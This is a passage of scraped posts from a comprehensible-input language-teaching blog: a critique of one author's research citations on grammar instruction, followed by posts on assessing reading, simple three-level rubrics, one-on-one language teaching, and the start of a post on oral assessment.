(declarative) knowledge of &#8220;grammar&#8221; can be accessed</u>. The post-treatment measures of speaking and writing, by Erlam&#8217;s admission, did not prevent students from &#8220;thinking about&#8221; answers. In other words, Erlam tested for conscious learning and not implicit acquisition.&nbsp;This does not therefore appear to address Conti&#8217;s claim.</p> <p><strong><em>Fotos, S. &amp; R. Ellis. 1991. ‘Communicating about grammar: a task-based approach’. TESOL Quarterly 25/4: 605-628.&nbsp;</em></strong>This study, in the authors&#8217; words, measured and &#8220;encouraged communication about grammar.&#8221; The authors tried to see if conscious-grammar problem-solving helped students learn grammar rules (learn = consciously understand and explain). This study does not focus on acquisition, and therefore does not appear to support Conti&#8217;s claim.</p> <p><strong><em>Gass, S. &amp; L. Selinker. 2008. Second Language Acquisition: an Introductory Course (Third Edition). New York: Routledge/Taylor.&nbsp;</em></strong>This is not a book of empiricial studies, and therefore does not support Conti&#8217;s claim.</p> <p><strong><em>Genesee, F. 1987. Learning through Two Languages. New York: Newbury House.</em></strong>&nbsp; This book does not contain empirical data, and so does not support Conti&#8217;s claim.</p> <p><strong><em>Hulstijn, J. 1995. ‘Not all grammar rules are equal: giving grammar instruction its proper place in foreign language teaching’ in R. Schmidt (ed.). </em></strong>There may be a mis-citation in the list Conti provides. I could only find a 1994 collection from R. Schmidt (ed.), and this volume does not contain any empirical studies.&nbsp; If this is the text Conti recommends, it does not appear to support his contention.</p> <p><strong><em>Attention and Awareness in Foreign Language Learning (Technical Report Nº 9). Honolulu, Hawai’i: University of Hawai’i, Second Language Teaching and Curriculum Center, 359-386.&nbsp;</em></strong>This paper&#8211; if I have found the right one&#8211; outlines theories about consciousness and the &#8220;noticing hypothesis&#8221; in SLA, but does not provide empirical data.&nbsp; It therefore does not appear to support Conti&#8217;s claim.</p> <p><em><strong>Johnson, K. 1996. Language Teaching and Skill Learning. Oxford: Blackwell.</strong>&nbsp;&nbsp;</em>This is a teaching handbook.</p> <p><em><strong>Klapper, J. &amp;&nbsp;</strong><strong style="color:var(--color-neutral-600);">J. Rees. 2003. ‘Reviewing the case for explicit grammar instruction in the university foreign language learning context’. Language Teaching Research 7/3: 285-31</strong><strong><span style="color:var(--color-neutral-600);">4</span></strong></em><span style="color:var(--color-neutral-600);">.&nbsp;&nbsp;This study compared English L1 students of L2 German. It compared two groups: those taught a basically &#8220;hardcore grammar&#8221; German class (focus on form</span><span style="color:var(--color-neutral-600);"><span style="text-decoration:underline;"><strong><em>s</em></strong></span></span><span style="color:var(--color-neutral-600);">), and those taught a much less grammar-focused &#8220;society and culture&#8221; class (focus on form).&nbsp; </span></p> <p><span style="color:var(--color-neutral-600);">There are a number of problems with this study:<br /> 1. As the researchers themselves note, their study &#8220;might be thought to&nbsp;favour explicit over implicit language knowledge and it is certainly&nbsp;possible that slightly different results might have been obtained&nbsp;with fluency measures.&#8221; No kidding! The assessment tool was a gap-fill grammar test, on which the hardcore grammar students (FoFs)&nbsp; predictably beat the others.<br /> 2. There was no control group which received &#8220;pure&#8221; C.I.</span></p> <p>This study, because it assesses conscious grammar knowledge and not spontaneous comprehension and/or production, does not support Conti&#8217;s claim.</p> <p><strong><em>Ming, C. S. &amp; N. Maarof. 2010. ‘The effect of C‐R activities on personal pronoun acquisition’. Procedia – Social and Behavioral Sciences 2/2: 5045-5050.&nbsp; </em></strong>For the purposes of examining acquisition, this study is flawed. It does not use either a control group or delayed post test. It assesses conscious learning rather than acquisition. It therefore does not support Conti&#8217;s claim.</p> <p><strong><em>Nation, P. 2007. ‘The four strands’. Innovation in Language Learning and Teaching 1/1: 1-12.&nbsp;</em></strong>This does not provide any data and therefore does not support Conti&#8217;s claim.</p> <p><strong><em>Norris, J. M. &amp; L. Ortega. 2000. ‘Effectiveness of L2 instruction: a research synthesis and quantitative meta‐analysis’. Language Learning 50/3: 417-528.&nbsp;</em></strong>Ah yes, the bad boy. This study looked at&#8230;.every other study about language instruction, and concluded that, yes, grammar teaching is necessary. The devil, as always, is in the details: Ortega and Norris do not distinguish between research focused on acquisition (unrehearsed, spontaneous language use) and learning (where explicit awareness, rule-learning etc come into play).</p> <p><strong><em>Skehan, P. 2003. ‘Task-based instruction’. Language Teaching 36/ 1:1-14.&nbsp;</em></strong>This article discusses task-based teaching. It does not provide any empirical evidence for Conti&#8217;s claim.</p> <p><strong><em>Spada, N. &amp; P. M. Lightbown. 2008. ‘Form-focused instruction: isolated or integrated?’ TESOL Quarterly 42: 181‐207.</em>&nbsp;</strong>This discusses various types of instruction but does not provide data. It therefore does not support Conti&#8217;s claim.</p> <p><strong><em>Spada, N. &amp; Y. Tomita. 2010. ‘Interactions between type of instruction and type of language feature: a meta‐analysis’. Language Learning 60/2: 1‐46. </em></strong>In this study, the authors summarise research into instructional practices and conclude that, yes, explicit grammar instruction &#8220;works.&#8221;&nbsp; However&#8230;in my view, this meta-analysis is deeply flawed, for the following reasons.</p> <p>1.&nbsp;<span style="color:var(--color-neutral-600);"><strong>Only 4 sample studies have a 2nd delayed post-test</strong></span><span style="color:var(--color-neutral-600);">, of which the average length after treatment was 5 weeks. No delayed P.T. = we have no idea if the gains are durable.&nbsp;</span></p> <div> <div>2. As Eric Herman points out, &#8220;<strong>just because language use is &#8220;free&#8221; or &#8220;spontaneous&#8221; does not rule out people using explicit knowledge</strong> (especially if the treatment primed them to do so), and especially in an untimed written mode, which was counted as a &#8220;free&#8221; response!&#8221; The authors themselves write &#8220;Thus, one cannot be certain that the oral production tasks used in the primary studies for this meta-analysis are indeed measures of implicit knowledge&#8221; (p. 287).&#8221;</div> </div> <p>3. One &#8220;effective&#8221; study of VanPatten&#8217;s processing instruction, (Benati, 2005) was characterized as &#8220;explicit.&#8221; However, in P.I., as VanPatten has pointed out, students are&nbsp;not &#8220;being taught rules.&#8221;&nbsp;</p> <p>4. The single-biggest problem here, however, is the authors&#8217; description of language acquisition as &#8220;learning rules.&#8221; This is&nbsp;not what happens with language. There are, strictly speaking, no &#8220;rules&#8221; to be learned.</p> <p>One can summarise Spada and Tomita by saying they provide evidence that under some conditions, explicit grammar instruction appears to help production under conditions where conscious language use can occur. This meta-analysis thus appears to contradict Conti&#8217;s claims.</p> <div> <div> <p>&nbsp;</p> <p><strong><em>Swain, M. 1985. ‘Communicative competence: some roles of comprehensible input and comprehensible output in its development’, in S. Gass &amp; C. Madden (eds.).&nbsp;&nbsp;</em></strong>Swain does not provide any data here. In addition, she notes that the main &#8220;job&#8221; of output in language acquisition is to generate more&#8211; and more focused&#8211; input for the learner. This article does not support Conti&#8217;s claim.</p> <p><strong><em>Input in Second Language Acquisition. Rowley MA: Newbury House, 235-253.</em></strong>&nbsp;This essay does not describe any specific evidence about language acquisition, but rather focuses on&nbsp;<em>possible</em> roles for input and output.</p> <p><strong><em>Swan, M. (1994). Design criteria for pedagogic language rules’, in M. Bygate, A. Tonkyn and E. Williams (Eds.), Grammar and the Language Teacher. London: Prentice Hall, pp. 45‐55.</em> The full article is available at&nbsp;<a class="" href="https://l.facebook.com/l.php?u=https%3A%2F%2Fmikeswan.net%2F%3Ffbclid%3DIwAR09HBLgRE8QXOv_e_LeKaVXjqf-LRnZqDQrPEYuovscctUncV-AchX1eVY&amp;h=AT1qF8BZgqDOxI9MHpTAe6jNJyiTBboAPdNwKsQBUHWVXGbwAeY-NCh6VANY0VPRdKCRfUiol76sHsD43YRczsMGvsrYxwFCUH1X0oFfLf06NQGox22cqeOe8mwie2DkqA" target="_blank" rel="nofollow noopener noreferrer">https://mikeswan.net</a><span class="whitespace">.&nbsp;&nbsp;</span></strong><span class="whitespace">This article does not contain any empirical evidence.</span></p> <p><strong><em>Van Patten, B. &amp; S. Oikkenon. 1996. ‘Explanation versus structured input in processing instruction’. Studies in Second Language Acquisition 18/4: 495-510.</em></strong><br /> This is a repeat of the classic VanPatten &amp; Cadierno (1993) study on the effects of processing instruction. They wanted to see whether exposure to language, direct instruction, or processing activities resulted in better development of ability to process &#8220;non-Englishy&#8221; language (Spanish, with its pronoun orders).&nbsp; Their conclusion: &#8220;[r]<em>esults showed that the beneficial effects of instruction were due to the structured input activities and not to the explicit information (explanation) provided to learners.&#8221;&nbsp;</em>In other words, this refutes Conti&#8217;s claim: it&#8217;s the processing of input, not instruction, that develops mental representation of language.</p> <p><strong><em>Willis, D. &amp; J. Willis. 2007. Doing Task-Based Teaching. Oxford: Oxford University Press.&nbsp;</em></strong>This book does not contain any empirical studies.&nbsp; It therefore does not support Conti&#8217;s claim.</p> <p><strong>Conclusion: </strong>Gianfranco&nbsp;Conti has claimed that explicit instruction generates more language acquisition (fast, accurate and spontaneous comprehension and production of language) than does the provision of comprehensible input. He provided 23 references that allegedly supported his claim. Only one&#8211;marginally&#8211; does so. The rest either contradict his claim, are irrelevant, or otherwise do not support it. As of this reading, Gianfranco Conti&#8217;s claims await substantiation.</p> </div> </div> </div><!-- .entry-content --> <footer class="entry-meta"> Posted in <a href="https://tprsquestionsandanswers.wordpress.com/category/uncategorized/" rel="category tag">Uncategorized</a> <span class="on-date"> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/09/gianfranco-contis-claim-and-the-evidence/" title="3:03 pm" rel="bookmark"><time class="entry-date" datetime="2019-05-09T15:03:59+00:00">May 9, 2019</time></a></span><span class="by-author"> by <span class="author vcard"><a class="url fn n" href="https://tprsquestionsandanswers.wordpress.com/author/cstolztprs/" title="View all posts by cstolztprs" rel="author">cstolztprs</a></span></span>. <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/09/gianfranco-contis-claim-and-the-evidence/#comments">2 Comments</a> </footer><!-- .entry-meta --> </article><!-- #post-# .#post-class-# --> <article id="post-11345" class="post-11345 post type-post status-publish format-standard hentry category-assessment-and-evaluation category-bad-ideas-2 category-best-practices category-martina-bex category-reading-2 category-uncategorized"> <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/02/how-should-i-use-questions-to-assess-reading/" rel="bookmark"> <header class="entry-header"> <h1 class="entry-title">(How) Should I Use Questions to Assess&nbsp;Reading?</h1> </header><!-- .entry-header --> </a> <div class="entry-content"> <p>Yesterday I found a kid in my English class copying this from her neighbour.  It is post reading assessment&#8211; in Q&amp;A form&#8211; for the novel Les yeux de Carmen. TPT is <em>full</em> of things like this, as are teachers guides,, workbooks, etc.</p> <p>The idea here is, read, then show your understanding of the novel by answering various questions about it. It &#8220;works&#8221; as a way to get learners to re-read, and as what Adminz like to call &#8220;the accountability piece,&#8221; ie, &#8220;the reason to do it is cos it&#8217;s for marks.&#8221;</p> <p>Before I get into today&#8217;s post, I should note, I (and every teacher I know) uses some kind of post-reading activity.</p> <p><img data-attachment-id="11344" data-permalink="https://tprsquestionsandanswers.wordpress.com/2019/05/02/how-should-i-use-questions-to-assess-reading/img_2201/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/05/img_2201.jpg" data-orig-size="2448,3264" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;2.2&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;iPhone 6&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;1556714597&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;4.15&quot;,&quot;iso&quot;:&quot;50&quot;,&quot;shutter_speed&quot;:&quot;0.033333333333333&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;1&quot;}" data-image-title="img_2201" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/05/img_2201.jpg?w=225" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/05/img_2201.jpg?w=620" class="size-full wp-image-11344" src="https://tprsquestionsandanswers.files.wordpress.com/2019/05/img_2201.jpg?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/05/img_2201.jpg?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/05/img_2201.jpg?w=1240 1240w, https://tprsquestionsandanswers.files.wordpress.com/2019/05/img_2201.jpg?w=113 113w, https://tprsquestionsandanswers.files.wordpress.com/2019/05/img_2201.jpg?w=225 225w, https://tprsquestionsandanswers.files.wordpress.com/2019/05/img_2201.jpg?w=768 768w" sizes="(max-width: 620px) 100vw, 620px" /></p> <p><strong>Q: Should I use questions to assess reading?</strong></p> <p><strong>A: Probably not. Here&#8217;s why.</strong></p> <ol> <li><strong>How do we mark it?</strong> What if the answer is right, but the French is poor? Or the reverse? Half a mark each? Do we want complete sentences? What qualifies as acceptable and not for writing purposes? What if there is more than one answer? What&#8217;s the rubric we use for marking?</li> <li><strong>It can (and, basically, <em>should) </em>be copied.</strong> This is the kind of thing that a teacher would send home to get kids to re-read the novel. Fine, but&#8230;it&#8217;s boring, and it takes a long time. It doesn&#8217;t use much brain power. If <em>I</em> were a student, I would copy this off my neighbour. If you don&#8217;t get caught, you save a bunch of time, and the teacher has no way of noticing.</li> <li><strong>It would <em>totally suck</em> to mark this</strong>. Do you actually want to read 30&#8211; or <em>60!</em>&#8212; of these?!? I dunno about you folks, but I have a life. We have to mark, obviously, but these, ugh, I&#8217;d fall asleep.</li> <li><strong>It&#8217;s a lot of work for few returns.</strong> I asked the kid who&#8217;d lent her answers to her friend how long it took (btw, there is one more page I didn&#8217;t copy), and she said &#8220;about 45 min.&#8221; This is a <em>lot</em> of time where very little input is happening.  The activity should either be shorter, or should involve reading another story. As Beniko Mason, Stephen Krashen and Jeff McQuillan (aka The Backseat Linguist) show us, i<a href="https://tprsquestionsandanswers.wordpress.com/2018/02/24/do-we-need-to-do-post-reading-activities/">nput is more efficient than input plus activities</a> (ie, instead of questions about a story, read another story).  As the great Latinist James Hosler once remarked, &#8220;for me, assessment is just another excuse to deliver input.&#8221;</li> </ol> <p>So&#8230;<strong>how <em>should</em> we assess reading? </strong>Here are a bunch of ideas, none of them mine, that <em>work.</em></p> <p>A. Read the text, and <strong><a href="https://tprsquestionsandanswers.wordpress.com/2017/10/05/win-win-with-comic-books/">make it into a comic</a></strong>. Easy, fun, useful for your classroom library and requires a bit of creativity.</p> <p>B. Do some <strong><a href="https://comprehensibleclassroom.com/2014/07/10/smash-doodle/">smash doodles</a></strong>. This is basically a comic, but minus any writing. As usual, Martina Bex has killer ideas.</p> <p>C. Do a <strong>discourse scramble</strong> activity. For these, take 5-10 sentences from the text, and print them out of order (eg a sentence from the end of the text near the beginning, etc). Students have to sort them into correct order, then translate into L1. This is fairly easy&#8211; and even easier if a student has done the reading, heh heh&#8211;, as well as not requiring output while requiring re-reading.</p> <p>Another variant on a discourse scramble is, have students copy the sentences down into order and then illustrate them.</p> <p>For C, they get one mark per correct translation (or accurate pic), and one mark for each sentence in its proper place. Discourse scramble answers can be copied, so I get kids to do them in class.  They are also due day-of, because if kids take them home others will copy.</p> <p>D. <strong>If you have kids with written output issues, you can always just interview them</strong> informally: stop at their desk or have them come to you and ask them some questions (L1, or simple L2) about the text.</p> <p>Alrighty! Go forth and assess reading mercifully :-).</p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p> </div><!-- .entry-content --> <footer class="entry-meta"> Posted in <a href="https://tprsquestionsandanswers.wordpress.com/category/assessment-and-evaluation/" rel="category tag">Assessment and Evaluation</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/bad-ideas-2/" rel="category tag">Bad Ideas</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/best-practices/" rel="category tag">Best Practices</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/martina-bex/" rel="category tag">martina bex</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/reading-2/" rel="category tag">Reading</a>, <a href="https://tprsquestionsandanswers.wordpress.com/category/uncategorized/" rel="category tag">Uncategorized</a> <span class="on-date"> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/02/how-should-i-use-questions-to-assess-reading/" title="11:15 pm" rel="bookmark"><time class="entry-date" datetime="2019-05-02T23:15:55+00:00">May 2, 2019</time></a></span><span class="by-author"> by <span class="author vcard"><a class="url fn n" href="https://tprsquestionsandanswers.wordpress.com/author/cstolztprs/" title="View all posts by cstolztprs" rel="author">cstolztprs</a></span></span>. <a href="https://tprsquestionsandanswers.wordpress.com/2019/05/02/how-should-i-use-questions-to-assess-reading/#comments">5 Comments</a> </footer><!-- .entry-meta --> </article><!-- #post-# .#post-class-# --> <article id="post-11323" class="post-11323 post type-post status-publish format-standard hentry category-uncategorized tag-adoption-of-research tag-assessment tag-comprehensible-input tag-lets-have-fun"> <a href="https://tprsquestionsandanswers.wordpress.com/2019/04/23/the-rule-of-three-simpler-evaluation/" rel="bookmark"> <header class="entry-header"> <h1 class="entry-title">The Rule of Three: Simpler&nbsp;Evaluation</h1> </header><!-- .entry-header --> </a> <div class="entry-content"> <p>Teachers are uhhhh obsessive, especially about marking. We write and rewrite assessment instruments, when we <em>could</em> be hitting a bachata class, ripping up the Grand Wall after work, or kicking back with our five-year-old.</p> <p><img data-attachment-id="11339" data-permalink="https://tprsquestionsandanswers.wordpress.com/2019/04/23/the-rule-of-three-simpler-evaluation/img_2157/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2157.jpg" data-orig-size="340,221" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="img_2157" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2157.jpg?w=300" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2157.jpg?w=340" src="https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2157.jpg?w=620" class="size-full wp-image-11339" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2157.jpg 340w, https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2157.jpg?w=150 150w, https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2157.jpg?w=300 300w" sizes="(max-width: 340px) 100vw, 340px" ></p> <p>^ wanna be overloaded like her? ^ 😞😞</p> <p>We spend<strong> too much time thinking about grading</strong>. Luckily for us, I&#8217;m gonna make the rest of your teaching career waaaaaay simpler by showing you <strong>how to make marking simple</strong>.</p> <p>So&#8230;imagine if you got marked on partying. They give you a Number for how well you party.</p> <p>Q: what would the rubric look like?</p> <p>A: like this&#8230;</p> <p><strong>1</strong> You are on your way to the party.<br /> <strong>2</strong> You are standing in the doorway, chatting with the host, eyeing a nice martini.<br /> <strong>3</strong> You are shaking it on the dancefloor with thirty others, with your second drink, and the sexiest person at the party is checking you out.</p> <p>Works? Sure! It&#8217;s simple, quick and accurate. Your Party Mark will be 34%, 66% or 100%. Now, say we also wanted to grade outfits. So we add this:</p> <p><strong>1</strong> Sweats and slides are kinda basic&#8230;but hey, you got out of bed!<strong> </strong></p> <p><strong>2</strong> Business casual? You look good and respectable but no eyeballs/mentions for you. <strong> </strong></p> <p><strong>3 </strong>Oh yeah! What&#8217;s yr Insta, gorgeous? 😁</p> <p>As we evaluate our partiers, they can get marks from 2/6, going upward in 15% intervals, to 6/6.</p> <p>Various assessment gurus will tell you something fairly similar regarding attaching Numberz to Performancez: there are only three real levels of skill that one can accurately describe.&nbsp; These are basically, <strong>not yet proficient, functionally proficient, and fully proficient</strong>. Breaking things down further is complicated, and therefore makes marking slower (and rubrics harder for students to understand). The more you refine descriptors and levels, the harder it is to distinguish between them.</p> <p>So here is our <strong>Rule of Three for Evaluation:</strong></p> <p>1. We focus on three levels of skill (not yet, just got it, fully proficient). 2. There is a clear difference between each level.</p> <p>Now, I&#8217;ma show y&#8217;all how this works for a language class. Here&#8217;s our oral interaction rubric (end of year, zero prep, totally 100% spontaneous &amp; unplanned Q&amp;A with a student, Level 2 and up in any language).</p> <p>What matters? 1. student comprehension of interlocutor 2. accurate, comprehensible output 3. degree of engagement with interlocutor</p> <p><strong>3. </strong>I understand everything said. My errors have minimal impact on how understandeable I am. I ask and answer questions, and keep conversation going, appropriately.</p> <p><strong>2.</strong> I understand much of what is said with some obvious gaps. My errors occasionally make me impossible to understand. I try to keep conversation going but sometimes have problems adding to/elaborating on what has been said.</p> <p><strong>1.</strong> I don&#8217;t understand much of what is said. My errors often make me hard to understand. I have consistent problems keeping the convo going.</p> <p>This rubric is s 3&#215;3 and generates marks between 3 and 9 out of 9 (ie 33%-100% in 11% intervals). It&#8217;s a nice mix of detail, fast, and simple. You basically never want a rubric more complex than 3&#215;3 cos it gets too texty for kids to read.</p> <p>There you go. Use it if you want it.</p> <p>Anyway, a few notes to go with this (and with marking writing, or anything else):</p> <p><strong>A. You can mark via selective sample</strong>. Eg, for writing, say your kids pump out 300-word stories (mid Level 1). I&#8217;ll bet you dinner and a movie that marking <em>any three sentences</em> will show you their proficiency as accurately as <em>reading the entire thing</em>. Same goes for answering questions about a reading, or listening. Pick a small sample and go.</p> <p><strong>B. You will generally see marks &#8220;clustering.&#8221;</strong> The kid who understands all the questions/comments in an oral interview will <em>probably</em> also be able to speak well. This is cos most &#8220;skills&#8221; develop in concert. With our partying rubric, it is likely that Mr Dressed To Kill is <em>also</em> quite sociable, a good and enthusiastic dancer, etc. Yes, there will be the odd kid who understands everything but can&#8217;t say much, but this is uncommon.</p> <p>Now would somebody please make rubrics for spontaneous written output and reading comp also? Create &amp; share.</p> <p>Let&#8217;s be DONE with marking questions and focus on what matters: finding cool input for kids, and making our grading quick &amp; simple, so that we can relax after work &amp; show up energised. Remember, one of C.I.&#8217;s greatest innovators at one point said that their method was developed <em>to boost their golf score</em>. The logic? Well-rested, happy teacher = good teacher 😁😁.</p> <p>&nbsp;</p> <p>&nbsp;</p> </div><!-- .entry-content --> <footer class="entry-meta"> Posted in <a href="https://tprsquestionsandanswers.wordpress.com/category/uncategorized/" rel="category tag">Uncategorized</a> and tagged <a href="https://tprsquestionsandanswers.wordpress.com/tag/adoption-of-research/" rel="tag">adoption of research</a>, <a href="https://tprsquestionsandanswers.wordpress.com/tag/assessment/" rel="tag">assessment</a>, <a href="https://tprsquestionsandanswers.wordpress.com/tag/comprehensible-input/" rel="tag">comprehensible input</a>, <a href="https://tprsquestionsandanswers.wordpress.com/tag/lets-have-fun/" rel="tag">let's have fun</a><span class="on-date"> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/04/23/the-rule-of-three-simpler-evaluation/" title="6:54 pm" rel="bookmark"><time class="entry-date" datetime="2019-04-23T18:54:25+00:00">April 23, 2019</time></a></span><span class="by-author"> by <span class="author vcard"><a class="url fn n" href="https://tprsquestionsandanswers.wordpress.com/author/cstolztprs/" title="View all posts by cstolztprs" rel="author">cstolztprs</a></span></span>. <a href="https://tprsquestionsandanswers.wordpress.com/2019/04/23/the-rule-of-three-simpler-evaluation/#comments">3 Comments</a> </footer><!-- .entry-meta --> </article><!-- #post-# .#post-class-# --> <article id="post-11326" class="post-11326 post type-post status-publish format-standard hentry category-uncategorized"> <a href="https://tprsquestionsandanswers.wordpress.com/2019/04/17/can-anyone-teach-a-language/" rel="bookmark"> <header class="entry-header"> <h1 class="entry-title">Can Anyone Teach a&nbsp;Language?</h1> </header><!-- .entry-header --> </a> <div class="entry-content"> <p>Today somebody asked about a school in Mexico that teaches Spanish via C.I., as the student very much likes her TPRS (etc) class. There were a bunch of responses and suggestions, and then the following.</p> <p><img data-attachment-id="11325" data-permalink="https://tprsquestionsandanswers.wordpress.com/2019/04/17/can-anyone-teach-a-language/img_2137/" data-orig-file="https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2137.png" data-orig-size="750,1334" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="img_2137" data-image-description="" data-medium-file="https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2137.png?w=169" data-large-file="https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2137.png?w=576" class="size-full wp-image-11325" src="https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2137.png?w=620" srcset="https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2137.png?w=620 620w, https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2137.png?w=84 84w, https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2137.png?w=169 169w, https://tprsquestionsandanswers.files.wordpress.com/2019/04/img_2137.png 750w" sizes="(max-width: 620px) 100vw, 620px" /></p> <p>OK, two points.</p> <p>First, I havn&#8217;t said&#8211; or implied&#8211; anything Karen Rowan here says. No, language teachers are *not* replaceable &#8220;by any native speaker.&#8221; The teacher (native speaker or not) needs skills. A language teacher needs to be able to go slowly, repeat the words a lot, be interesting and restrict the vocab load. These are important skills.</p> <p>Sure, everyone is entitled to their opinion.  I&#8217;m not sure how that is relevant, and my opinion is not what Rowan here says. I generally prefer it when people don&#8217;t put words in my mouth. However, <em>in one-on-one situations&#8230;</em></p> <p>Second, today&#8217;s question:<br /> <strong>Q: Can anyone teach a language?<br /> A: With basic training, yes!</strong></p> <p>If you are a native speaker of ____, you need to do the following&#8211; in a one-on-one setting; classrooms are different&#8211; to teach a language. If you are a student of ____, all you have to do is tell (or get somebody to tell) your teacher to do these.</p> <ol> <li><strong>Base instruction around whatever interests the student</strong>. If Johnny gets to China and wants to talk food, have at! When I was in Guatemala, I was interested in politics, food and the lives of migrant workers. Most of the vocab one needs to know&#8211; high-frequency&#8211; will come up naturally during conversation.</li> <li> <strong>Limit vocabulary and recycle it</strong>. People need to hear the vocab over and over, in slightly varied contexts, to get to the automatic recognition stage of acquisition. Here is an example from a conversation I recall from Xela, Guatemala, in January of 1992:</li> </ol> <p style="padding-left:60px;"><em>Teacher: do you like Guatemalan food?</em><br /> <em>Me: Yes.</em><br /> <em>T: I like Guatemalan food. I also like Mexican food. I like Salvadorean food a bit. Do you like Mexican food?</em><br /> <em>M: Yes.  Tacos delicious.</em><br /> <em>T: Yes, tacos are delicious. In Guatemala, tostadas are like tacos.  They are also delicious.</em></p> <p>The day we had this convo, we later went to the market and ordered tostadas. You can see here that the teacher used tacos, delicious, are and I/you like over and over.</p> <p>My teachers were able to circle&#8211; repeat in Q&amp;A form&#8211; whatever we both wanted to talk about. When we needed new vocab, they said it, I wrote it down, and we used it.  Daily, my understanding of my host family&#8217;s Spanish grew. I never in four weeks saw a vocab list, got grammar homework, or got asked to conjugate verbs.</p> <p>Most of my teachers were Uni students, but not full-time professional teachers.</p> <p>3. If I had a student going abroad, I would tell them to get the teacher to tell stories, talk with the student about whatever interests them, go slow,  and circle the vocab. I would also suggest they use any apps (eg LingQ, Duolingo) that don&#8217;t bore them, and read whatever they find interesting.</p> <p><span style="text-decoration:underline;"><strong>This is really all you need to be an effective  language teacher <em>for one-on-one</em> situations</strong></span><strong>. </strong>If it&#8217;s a class, you&#8217;ll need a method (TPRS, Movietalk, Picturetalk, Story Listening, reading) plus training in these plus novels etc, plus general knowledge about assessment, classroom management, etc.</p> <p>&nbsp;</p> <p>&nbsp;</p> </div><!-- .entry-content --> <footer class="entry-meta"> Posted in <a href="https://tprsquestionsandanswers.wordpress.com/category/uncategorized/" rel="category tag">Uncategorized</a> <span class="on-date"> on <a href="https://tprsquestionsandanswers.wordpress.com/2019/04/17/can-anyone-teach-a-language/" title="7:17 pm" rel="bookmark"><time class="entry-date" datetime="2019-04-17T19:17:52+00:00">April 17, 2019</time></a></span><span class="by-author"> by <span class="author vcard"><a class="url fn n" href="https://tprsquestionsandanswers.wordpress.com/author/cstolztprs/" title="View all posts by cstolztprs" rel="author">cstolztprs</a></span></span>. <a href="https://tprsquestionsandanswers.wordpress.com/2019/04/17/can-anyone-teach-a-language/#comments">1 Comment</a> </footer><!-- .entry-meta --> </article><!-- #post-# .#post-class-# --> <article id="post-11300" class="post-11300 post type-post status-publish format-standard hentry category-assessment-and-evaluation category-best-practices category-uncategorized"> <a href="https://tprsquestionsandanswers.wordpress.com/2019/02/25/oral-assessment-made-easy/" rel="bookmark"> <header class="entry-header"> <h1 class="entry-title">Oral Assessment Made&nbsp;Easy</h1> </header><!-- .entry-header --> </a> <div class="entry-content"> <p>If you must assess oral proficiency&#8211; which should not be done before the end of Level 2, in my humble opinion&#8211; here is the world&#8217;s simplest hack. No more interviews, &#8220;speaking tasks&#8221; and hassles where you sit with one kid and the other 28 are off-ta&#8211; err, I mean, doing their Kahoots or whatever.</p> <p>In a C.I. class, because any feedback other than &#8220;pay more attention &amp; ask for help&#8221; doesn&#8217;t do anything for acquisition, and because testing wastes time by not delivering input, we want to put as little time and effort into Assigning Numberz as possible. We also&nbsp;<em>never</em> want to assign role-plays or &#8220;pretend you&#8217;re customer and sales associate&#8221;-type scenarios, which test memorisation rather than spontaneous communication.</p> <p><img src="https://i1.wp.com/www.thekalbeegroup.com/img/kids-read-script.jpg" alt="Image result for kids reading from scripts" width="370" height="185"></p> <p><em>This is what we do not want.<br /> </em></p> <p>This is very simple. Starting in the last 1/4 or so of level 2 Spanish, I randomly check on how kids communicate in class.&nbsp; Do they ask and answer questions?&nbsp; Do they use complete sentences? Can they initiate and sustain conversation? To what if any extent do their speaking 